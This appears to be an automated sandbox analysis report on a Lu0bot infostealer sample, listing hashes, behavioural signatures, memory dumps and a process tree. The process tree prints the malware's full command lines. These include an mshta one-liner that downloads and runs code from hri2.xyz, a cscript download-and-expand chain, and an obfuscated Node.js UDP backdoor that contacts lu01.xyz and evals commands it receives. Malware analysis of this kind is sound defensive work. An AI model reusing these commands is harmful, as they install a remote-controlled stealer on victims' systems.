lu0bot | 5a2264e42206d968cbcfff583853a0e0d4250f078a5e59b77b8def16a6902e3f

General

Target

euthree_20210608-233519.exe
Size

2KB
MD5

cd17d11bb2c8dd9942e816677df2dae2
SHA1

140fbc4ec7fd4be8c66dd38d6836473726fa7c1b
SHA256

5a2264e42206d968cbcfff583853a0e0d4250f078a5e59b77b8def16a6902e3f
SHA512

31180403ffbe4a2c2144bab8a93aed6d64c85a2c6658b44e8ee7cf8bc1a0e530de4141c0e685826f79457e396bb3d70a25c87ce30a142b481fc9bde0b93c6762

Score

10^/10

lu0bot stealer trojan

Malware Config

Signatures

Lu0bot
Lu0bot is a lightweight infostealer written in NodeJS.
trojan stealer lu0bot

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2024	mshta.exe
4	1344	cscript.exe

Executes dropped EXE 1 IoCs

pid	Process
1016	node.exe

Loads dropped DLL 1 IoCs

pid	Process
1480	cscript.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 1040 wrote to memory of 2024	1040	euthree_20210608-233519.exe	25
PID 1040 wrote to memory of 2024	1040	euthree_20210608-233519.exe	25
PID 1040 wrote to memory of 2024	1040	euthree_20210608-233519.exe	25
PID 1040 wrote to memory of 2024	1040	euthree_20210608-233519.exe	25
PID 2024 wrote to memory of 1984	2024	mshta.exe	27
PID 2024 wrote to memory of 1984	2024	mshta.exe	27
PID 2024 wrote to memory of 1984	2024	mshta.exe	27
PID 2024 wrote to memory of 1984	2024	mshta.exe	27
PID 1984 wrote to memory of 1344	1984	cmd.exe	29
PID 1984 wrote to memory of 1344	1984	cmd.exe	29
PID 1984 wrote to memory of 1344	1984	cmd.exe	29
PID 1984 wrote to memory of 1344	1984	cmd.exe	29
PID 1984 wrote to memory of 700	1984	cmd.exe	33
PID 1984 wrote to memory of 700	1984	cmd.exe	33
PID 1984 wrote to memory of 700	1984	cmd.exe	33
PID 1984 wrote to memory of 700	1984	cmd.exe	33
PID 1984 wrote to memory of 1480	1984	cmd.exe	34
PID 1984 wrote to memory of 1480	1984	cmd.exe	34
PID 1984 wrote to memory of 1480	1984	cmd.exe	34
PID 1984 wrote to memory of 1480	1984	cmd.exe	34
PID 1480 wrote to memory of 1016	1480	cscript.exe	35
PID 1480 wrote to memory of 1016	1480	cscript.exe	35
PID 1480 wrote to memory of 1016	1480	cscript.exe	35
PID 1480 wrote to memory of 1016	1480	cscript.exe	35

C:\Users\Admin\AppData\Local\Temp\euthree_20210608-233519.exe
"C:\Users\Admin\AppData\Local\Temp\euthree_20210608-233519.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1040
- C:\Windows\SysWOW64\mshta.exe
  mshta "javascript:document.write();195;y=unescape('%339%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F%32f%652%652%62%7E%326').split('~');150;try{x='WinHttp';35;x=new ActiveXObject(x+'.'+x+'Request.5.1');125;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);82;x.send();165;y='ipt.S';201;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);68;}catch(e){};129;;window.close();"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1623232550443.txt & cscript /nologo /e:jscript get1623232550443.txt "http%3A%2F%2Fhri2.xyz%2Fhri%2F%3F26ece80b3%26b%3Da30f6953" node.cab & expand node.cab node.exe & del get1623232550443.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1623232550443.txt & cscript /nologo /e:jscript get1623232550443.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%276ece80b3%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1623232550443.txt
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1984
  - - C:\Windows\SysWOW64\cscript.exe
      cscript /nologo /e:jscript get1623232550443.txt "http%3A%2F%2Fhri2.xyz%2Fhri%2F%3F26ece80b3%26b%3Da30f6953" node.cab
      4⤵
      Blocklisted process makes network request
      PID:1344
  - - C:\Windows\SysWOW64\expand.exe
      expand node.cab node.exe
      4⤵
      Drops file in Windows directory
      PID:700
  - - C:\Windows\SysWOW64\cscript.exe
      cscript /nologo /e:jscript get1623232550443.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%276ece80b3%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:1480
    - - C:\ProgramData\DNTException\node.exe
        
        "C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%276ece80b3%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))
        5⤵
        Executes dropped EXE
        
        PID:1016

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1016-77-0x0000000007C00000-0x0000000007C01000-memory.dmp

Filesize
4KB

Download
memory/1016-78-0x0000000035600000-0x0000000035601000-memory.dmp

Filesize
4KB

Download
memory/1016-76-0x000000000D500000-0x000000000D501000-memory.dmp

Filesize
4KB

Download
memory/1016-75-0x000000000D200000-0x000000000D201000-memory.dmp

Filesize
4KB

Download
memory/1016-74-0x000000000DB00000-0x000000000DB01000-memory.dmp

Filesize
4KB

Download
memory/1016-73-0x000000002D300000-0x000000002D301000-memory.dmp

Filesize
4KB

Download
memory/1344-63-0x0000000074F31000-0x0000000074F33000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing